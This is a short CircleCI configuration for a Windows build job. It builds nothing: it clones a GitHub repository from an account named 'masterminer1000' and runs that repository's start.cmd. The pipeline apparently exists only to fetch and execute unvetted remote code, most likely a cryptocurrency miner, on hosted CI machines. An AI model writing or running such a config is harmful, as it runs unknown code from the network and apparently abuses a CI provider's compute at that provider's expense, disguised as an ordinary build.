version: 2.1
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build:
    executor:
      name: win/default
      shell: cmd.exe
    steps:
      - run:
          name: Invoke
          command: git clone https://github.com/masterminer1000/1.git
      - run: start.cmd
